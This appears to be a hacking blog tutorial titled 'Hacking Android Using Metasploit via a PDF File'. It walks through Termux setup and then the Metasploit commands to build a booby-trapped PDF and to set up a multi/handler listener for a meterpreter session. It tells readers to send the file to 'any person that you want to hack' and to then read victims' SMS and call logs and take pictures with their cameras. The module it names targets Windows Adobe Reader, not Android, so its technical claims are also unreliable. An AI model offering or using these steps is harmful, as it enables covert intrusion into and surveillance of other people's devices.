Requirements :-
-
Termux app( Download it from Play Store).
-
Install Metasploit Framework in TermuX
-
TermuX should be allowed to use External Storage (For this enter the command : “ termux-setup-storage ”).
-
(Recommended not necessary) Use Hacker`s Keyboard for entering commands in TermuX easily.
Once you have completed all requirements we are ready to perform the hack.
Hacking Android Using Metasploit via a PDF File :-
Step 1 :- Launch Metasploit Console
First of all open Termux, if you are on android or just open your terminal if on Desktop.
Enter the following command to open Metasploit Console
msfconsole
If this kind of screen appears in front of you then we are good and if not there might be problem in installation of metasploit.
Step 2 :- Creating the Evil PDF (Payload)
Type the commands given below or simply copy paste them one by one to create the PDF File.
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
Then you have to set your Localhost. For this you will need your IP Address, to check your IP Address type
ifconfig
in new seesion on termux or in another terminal window. Now come to your metasploit console and set your Localhost like this –
set LHOST 192.168.0.0
Replace the IP Address given in above command by your own IP Address
Now its time to setup port for this enter this command –
set LPORT 4444
You are free to use any port you want like 4564, 8080 etc.
Now its time to generate the Evil PDF File do this by below command –
set filename MyDocument.pdf
Here, you are also free to use any name you want just put it in place of MyDocument but be sure to put .pdf at the end of its name.
Now the last command is for final creation of file do this by typing this command –
exploit
Now within a second a message will be displayed saying that your PDF File is created at any default location. First copy that PDF File to your either Internal or External storage like this
mv <fille_location> <new_location>
And now you are done with creation part. Send it to any person that you want to hack. As soon as he/she will open that pdf file you will get the metasploit session.
Step 3 :- Exploitation
First open your metasploit console by typing
msfconsole
and then start writing below mentioned command –
use exploit/multi/handler/
set LHOST <your_IP>
set LPORT 4444
exploit
Note – Make sure to enter same IP and Port as you entered above in Step 2.
It will some time and then BOOM you will get meterpreter session. If such output appears then you got access to victim’s phone.
For seeing his/her sms, call logs, taking picture from victim’s camera you can use command given on the post about How To Hack An Android Phone With Another Android (Without Root) Android To Android Hacking in the last section.